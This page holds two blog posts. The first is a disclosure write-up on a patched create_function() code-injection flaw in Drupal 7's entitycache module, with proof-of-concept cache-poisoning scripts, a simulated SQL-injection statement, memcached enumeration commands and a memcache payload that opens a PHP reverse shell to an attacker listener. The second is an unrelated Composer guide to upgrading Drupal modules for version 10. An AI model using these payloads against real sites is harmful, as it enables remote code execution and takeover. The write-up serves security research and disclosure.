Nov 27 2023

PHP's create_function() was:

DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0

As the docs say, its use is highly discouraged.

PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular linux distributions provide support for years beyond the upstream End of Life).

Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.

The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.

The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.

This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.

To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.

Is it unsafe input?

Interestingly, the issue is in a drush-specific .inc file:

/**
 * Implements hook_drush_cache_clear().
 */
function entitycache_drush_cache_clear(&$types) {
  $entities = entity_get_info();
  foreach ($entities as $type => $info) {
    if (isset($info['entity cache']) && $info['entity cache']) {
      // You can't pass parameters to the callbacks in $types, so create an
      // anonymous function for each specific bin.
      $lambda = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);");
      $types['entitycache-' . str_replace('_', '-', $type)] = $lambda;
    }
  }
}

https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...
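
For context, here's a minimal sketch of how the same callback could be written without create_function(), using a closure that captures $type by value; this illustrates the safe pattern rather than the module's exact fix:

function entitycache_drush_cache_clear(&$types) {
  $entities = entity_get_info();
  foreach ($entities as $type => $info) {
    if (!empty($info['entity cache'])) {
      // $type is captured as data and never concatenated into a code
      // string, so there is nothing for an attacker to inject into.
      $types['entitycache-' . str_replace('_', '-', $type)] = function () use ($type) {
        return cache_clear_all('*', 'cache_entity_' . $type, TRUE);
      };
    }
  }
}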

Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.

So - as is often the case - it's very risky to pass unsafe user input to it.

In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().

Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?

entity_get_info() uses a cache to minimise calls to implementations of hook_entity_info().

If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.

Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.

How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:

Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.

So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.

We'll also look at how an attacker might use memcache as an attack vector.

Proof of Concept

To keep things simple initially, we'll look at conducting the attack via SQL.

Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.

As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.

Objectives

  • The malicious payload has to be injected into the array keys of the cached data returned by entity_get_info().
  • The injection cannot break Drupal so badly that drush cannot run a cache clear.
  • However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).

The relevant cache item here is:

$cache = cache_get("entity_info:$langcode")

https://git.drupalcode.org/project/drupal/-/blob/7.98/includes/common.in...

The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:

array('malicious payload' => 'foo');

Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_get_info() will return.

The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.

We can use drush to run some simple code that stores our array into the cache:

$ drush php
 
>>> $entity_info = array('malicious payload' => 'foo');
=> [
     "malicious payload" => "foo",
   ]
 
>>> cache_set('entity_info:en', $entity_info);

Now let's look at the cache item in the db:

$ drush sqlc
 
> SELECT * FROM cache WHERE cid = 'entity_info:en';
+----------------+-------------------------------------------+--------+------------+------------+
| cid            | data                                      | expire | created    | serialized |
+----------------+-------------------------------------------+--------+------------+------------+
| entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} |      0 | 1696593295 |          1 |
+----------------+-------------------------------------------+--------+------------+------------+

Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)

How is the site doing now? Let's try a drush status:

$ drush st
 
Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc).
 
Drush was not able to start (bootstrap) Drupal.  
Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.

That's not so great, and importantly we get the same error when we try to clear caches by running drush cc all.

We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.

The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.

It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.

We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb on a vanilla D7 install) and is therefore quite cumbersome to manipulate.

Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.

It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.

Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:

$entity_info['user'] = [                                                           
  'controller class' => 'EntityCacheUserController',                               
  'base table' => 'users',                                                         
  'entity keys' => ['id' => 'uid'],                                                
  'schema_fields_sql' => ['base table' => ['uid']],                                
  'entity cache' => TRUE,                                                          
];                                                                                 
 
$entity_info = [                                                                   
  'user' => $entity_info['user'],                                                  
  'file' => $entity_info['user'],                                                  
  'malicious payload' => $entity_info['user']
];

Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.

Let's try injecting that into the cache via drush php and then checking whether drush is still functional.

It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.

$ cat cache_injection.php
<?php
$entity_info['user'] = [
  'controller class' => 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];
 
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user']
];
 
cache_set('entity_info:en', $entity_info);
 
$ drush scr cache_injection.php
 
$ drush st
 Drupal version                  :  7.99-dev
 
...snip - no errors...
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => malicious payload
)

We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info.

$ drush cc all
'all' cache was cleared.
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => comment
    [1] => node
    [2] => file
    [3] => taxonomy_term
    [4] => taxonomy_vocabulary
    [5] => user
)

We're making progress though.

Let's try putting an actual payload into the array key in our script:

$ tail -n7 cache_injection.php 
 
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user']                                      
]; 
 
cache_set('entity_info:en', $entity_info);
 
$ drush scr cache_injection.php
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);} echo "code execution successful"; //
)
 
$ drush cc all
code execution successfulcode execution successful'all' cache was cleared.

Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.
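
Why does the message print while the caches are being cleared, rather than when the lambda is later invoked? create_function() works by eval()ing a string along the lines of "function __lambda_func() { <code> }", so once our array key has been concatenated into $code, the evaluated source looks roughly like this (line break added for readability):

function __lambda_func() { return cache_clear_all('*', 'cache_entity_foo', TRUE); }
echo "code execution successful"; //', TRUE);}

The quote in the key closes the string literal, the ", TRUE);}" completes the call and the function body, the echo then runs immediately when create_function() is called, and the trailing // comments out the remnant of the original code template.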

A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.

Having said that we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do that, they wouldn't really need to mess around with injecting payloads into the caches.

Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.

Attack via SQLi

If we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.

$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";'
 
a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}

This is not very pretty to look at, but we can see our array has been serialized.

If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.

To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.

After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.

Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.

I often think fiddly things like this are the hardest part of developing these PoC exploits!

# inject the payload using a drush script
$ drush scr cache_injection.php
 
# extract the payload into a SQL statement stored in a file
$ echo -n "UPDATE cache SET data = '" > sqli.txt
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt
$ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt
 
# empty the cache table, and repopulate it with valid entries
$ drush sqlq 'DELETE FROM cache;'
$ drush st
 
# inject the payload, simulating SQLi
$ cat sqli.txt | drush sqlc
 
# execute the attack
$ drush cc all
code execution successful ...

So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.

In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.

However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.

Attack via memcache

How about if the caches are in memcache; what might an attack look like then?

First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.

The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.

The mechanics of how we might do so are a little different with a "memcache injection" though.

The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).

In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.

Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:

$ echo "stats slabs" | nc memcached 11211 | head -n2
STAT 2:chunk_size 120
STAT 2:chunks_per_page 8738
 
$ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2
ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s]
ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]

This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs and this enumeration step may be a bit more complex.
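
For example, here's a rough sketch of enumerating every slab reported by stats slabs (the awk pattern assumes the "STAT <id>:chunk_size ..." output format shown above):

$ for id in $(echo "stats slabs" | nc memcached 11211 | awk -F'[ :]' '/chunk_size/ {print $2}'); do
    echo "stats cachedump $id 100" | nc memcached 11211
  done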

So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.

We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.

There are a couple of small complications we're likely to encounter with this workflow.

One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.

If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.

We can get around this by disabling compression on our test site.

Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).

This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp intact, it's possible that the item will already be expired by the time the payload is injected into the target site, and the attack will not work.

It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.

There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.

Injecting an item into memcache will typically mean using the SET command.

The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).

Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.

We also need to ensure that the PHP serialized data remains consistent; for example if we change an IP address we need to ensure that the string it's within still has the correct length e.g. s:80:\"foo' ...
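
For reference, the relevant part of the memcached text protocol looks like this (simplified; the data block must be exactly <bytes> bytes long):

set <key> <flags> <exptime> <bytes>\r\n
<data block>\r\n

In the PoC below, exptime is 0 (no expiry at the memcached level) and the serialized Drupal cache object is sent as the data block; the flags value is what the PHP client inspects to decide how to handle compression.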

Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:

$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211

This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().

$ ./poison_entity_info.sh  # this script contains the memcache set command above
STORED
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
  Array
  (
      [0] => user
      [1] => file
      [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);//
  )
 
$ drush cc all
'all' cache was cleared.

Meanwhile in the attacker's terminal...

$ nc -nvlp 1337
Listening on 0.0.0.0 1337
 
Connection received on 172.19.0.3 58220
 
python -c 'import pty; pty.spawn("/bin/bash")'
 
mcdruid @ drupal-7:/var/www/html$ head -n2 CHANGELOG.txt
Drupal 7.xx, xxxx-xx-xx (development version)
-----------------------

We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.

One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.

Perhaps the injection into the entity_info cache item already achieves that goal?

Could this attack also be carried out via Redis? Probably.

I'm sharing the details of this attack scenario because I think it's an interesting one, and because well-maintained sites should not be affected. In order to be exploitable, the victim site has to be running an outdated version of the entitycache module, on PHP < 8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.

As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().

Thanks to Greg Knaddison (greggles) for reviewing this post.

Nov 27 2023

Allan Chappell

Senior Support Lead

Allan brings technological know-how and grounds it with some simple country living. His interests include DevOps, animal husbandry (raising rabbits and chickens), hiking, and automated testing.

At the time of this blog, we have done two major version upgrades of Drupal and have refined the process along the way. There has been a lot of work in the community, through the efforts of people like Matt Glaman to make this process easier.

As a Support Engineer, I see a lot of approaches for achieving the same results in many areas of my work. Here, I’d like to share with you three different ways to achieve an upgrade of a module or theme that isn’t ready for the next major Drupal version, each with pros and cons, but all absolutely acceptable.

Why do we have this problem?

All new Drupal developers have a hard time with the layers of code changes that happen in the Drupal community. We have custom package types, custom install locations, patches, and scaffolding. To make the challenges worse, we have two ways to identify a module’s dependencies — that being a .info.yml file and for some, a composer.json. This is because some Drupal modules may want to build upon an existing PHP library or project, in addition to other Drupal modules. To ease the pain of having to define some dependencies twice, both in the .info.yml file and composer.json file, Drupal.org built their packagist, a repository of Composer packages, to read the .info.yml files from the root of the project and create Composer version constraints from that. For example, if the .info file contained the following:

name: My Module
type: module
core_version_requirement: ^8.8 || ^9
dependencies:
  - ctools:ctools

Then Drupal.org’s packagist would create the following for the release that contained that .info.yml file, saving the contrib developer a lot of trouble.

{
    "type": "drupal-module",
    "name": "drupal/my_module",
    "require": {
      "drupal/core": "^8.8 || ^9",
      "drupal/ctools": "*"
    }
  }

I hit on something there, though. It will create that for the release the .info.yml was in. When most code changes come in the form of patches, this poses a challenge. You apply your patch to the .info.yml after you download the release from Drupal.org’s packagist. Additionally, Drupal.org doesn’t create a new release entry for every patch file in the issue queue. So you are left with the question, “How do I install a module on Drupal 10 that requires Drupal 9 so that I can patch it to make it compatible for Drupal 10?”

Drupal Lenient

One of the easiest methods for those who don’t understand the ins and outs of Composer is to use the Drupal Lenient plugin. It takes a lot of the manual work out of defining new packages and works with any drupal-* typed package. Types are introduced to us through the Composer Installers plugin and manipulated further with something like Composer Installers Extender. Composer plugins can be quite powerful, but they ultimately add a layer of complexity to any project over using core Composer functionality.

Drupal Lenient works by taking any defined package pulled in by any means via Composer, and replacing the version constraint for drupal/core (currently, at the time of this writing, with "^8 || ^9 || ^10"). So where the requirements might look like the earlier example, "drupal/core": "^8.8 || ^9", they are replaced, making it now possible to install alongside Drupal 10, even though it might not be compatible yet. This allows you to patch, test, or use the module as is, much like if you had downloaded the zip and thrown it into your custom modules directory.

An example may look like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/my_module": "1.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  }"
  extra": {
    "composer-exit-on-patch-failure": true,
    "drupal-lenient": {
      "allowed-list": [
        "drupal/my_module"
      ]
    },
    "patches": {
      "drupal/my_module": {
        "3289029: Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2022-06-16/my_module.1.x-dev.rector.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
}

Note the Drupal Lenient allowed-list. Also note that you will need to make sure to install the plugin before trying to install the module that doesn’t support Drupal 10 in this case. If you want an excellent step-by-step, Matt put one together in the README.

The pros:

  • Easy-peasy to install
  • Feeds off the original packagist packages, so if there is an upgrade, you don’t have to do anything special to transition

The cons:

  • Lenient has the control and may cause inexplicable errors when updating due to unsupported core versions
  • PHP devs not familiar with Drupal Lenient won’t know to look for it
  • Flaky experiences when switching in and out of branches that include this plugin. If you context switch a lot, be prepared to handle some errors due to Composer’s challenges maintaining state between branches.
  • Patches to other dependencies inside composer.json still require you to run through some hoops

Custom package

If you want more control over what the module can and cannot do, while keeping the core of Composer functionality without adding yet another plugin, check out this method. What we will do here is find out which version the patch or merge request is being applied against. It should be stated in the issue queue and, by best practice, is a dev version.

If you are a perfectionist, you can use composer install -vvv to find the URL or cache file that the module’s metadata came from on packages.drupal.org. It is usually one of https://packages.drupal.org/files/packages/8/p2/drupal/my_module.json or https://packages.drupal.org/files/packages/8/p2/drupal/my_module~dev.json. You will note that the Composer cache system follows a very similar structure, swapping out certain characters with dashes.
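
For example, a hypothetical session for inspecting that cache (the path and exact file names vary per system and Composer version; on Linux the cache typically lives under ~/.cache/composer):

$ ls ~/.cache/composer/repo/https---packages.drupal.org-8/ | grep my_module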

With this information, you can grab the exact package as it’s defined in the Drupal packagist. Find the version you want, and then get it into your project’s composer.json.

Let’s use Context Active Trail as an example, because at the time of this writing, there is no Drupal 10 release available.

Looking through the issue queue, we see Automated Drupal 10 compatibility fixes, which has a patch attached. I grab the Composer package info and paste the 2.0-dev info into my composer.json under the “repositories” section as a type “package.”

Which should make your project look something like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": [
          "Drupal",
          "Context",
          "Active trail",
          "Breadcrumbs"
        ],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^4.1",
          "drupal/core": "^8.8 || ^9"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  }"
  extra": {
    "composer-exit-on-patch-failure": true,
    },
    "patches": {
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
}

Now let’s change our version criteria:

…
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^4.1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
…

And then add our patch:

…
  extra": {
    "composer-exit-on-patch-failure": true,
    },
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
…

Here, you will need to look to see if the patch is patching composer.json. If it is, you will need to modify your package information accordingly. For example, in this one, the fixer changes drupal/context from ^4.1 to ^5.0.0-rc1. That change looks like this:

…
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^5.0.0-rc1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
…

Lastly, sometimes you run into complications with the order in which packages are picked up by Composer. You may need to add an exclude element to the Drupal packagist entry.

…
  {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
  },
…

Our final composer.json for our project could look something like this with all the edits:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": [
          "Drupal",
          "Context",
          "Active trail",
          "Breadcrumbs"
        ],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^5.0.0-rc1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  }"
  extra": {
    "composer-exit-on-patch-failure": true,
    },
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
}

The pros:

  • Uses more core Composer functionality
  • A PHP developer will better understand what’s going on here
  • You are in complete control of how this module package and version are defined
  • All the work is in one file

The cons:

  • Requires some understanding of how composer.json, packagists, and the magic of Drupal’s packagist all work
  • That’s a messy composer.json for the project
  • If you have to use exclude, you have to leave it up to outside forces to let you know when that module finally puts out an actual D10-ready version, and then undo all of this work

Fork the module

Standard PHP Composer best practice says that if you make modifications to a package, fork it, maintain your modifications, and provide a pull request if it’s functionality you wish to contribute back. You can use this same approach with Drupal modules as well. Some may even say that’s what issue forks are for! That said, issue forks come with the downside that sometimes they go away, or are overridden with changes you don’t want. They are a moving target.

For the sake of this example, let’s assume that we have forked the module on GitHub to https://github.com/fourkitchens/context_active_trail.git. If you don’t know how to make a fork, simply do the following:

  • Clone the module to your local computer using the git instructions for the module in question
  • Check out the branch you want to base your changes on
  • Create a new repository on GitHub
  • Add it as a remote: git remote add github git@github.com:fourkitchens/context_active_trail.git
  • Push it! git push github 8.x-2.x

You can do this with a version of the module that is in a merge request in Drupal.org’s issue queue, too. That way you won’t have to reapply all the changes. However, if your changes are in a patch file, consider adding them to the module at this time using your favorite patching method. Push all your changes to the github remote.
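
For example, here's a minimal sketch of applying the earlier issue patch to the fork and publishing it (branch and file names taken from the examples in this post):

$ git checkout 8.x-2.x
$ curl -LO https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch
$ git apply context_d10comp_3286756.patch
$ git add -A && git commit -m "Apply Drupal 10 compatibility patch"
$ git push github 8.x-2.x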

If the patch files don’t have changes to composer.json, or if the module doesn’t have one, you will likely want to provide at least a bare-bones one that contains something like the following and commit it:

{
  "name": "drupal/context_active_trail",
  "type": "drupal-module",
  "require": {
    "drupal/context": "^5.0.0-rc1",
    "drupal/core": "^8.8 || ^9 || ^10"
  }
}

This will tell Composer what it needs to know inside the project about dependencies. This project already had a composer.json, so I needed to add the changes from the patch to it.

Inside our Drupal project we are working on, we need to add a new entry to the repositories section. It will look something like this:

    {
      "type": "vcs",
      "url": "https://github.com/fourkitchens/context_active_trail.git"
    },

The VCS type repository entry tells Composer to look at the repository and poll for all its branches and tags. These will be your new version numbers.

Much like in the “Custom Package” example, you may need to add an exclude property to the Drupal packagist entry.

…
  {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
  },
…

Now, since Drupal packagist isn’t here to give Composer some version aliases, we have to use the old notation dev-BRANCHNAME for our version. Our require entry will look something like this:

 "drupal/context_active_trail": "dev-8.x-2.x",

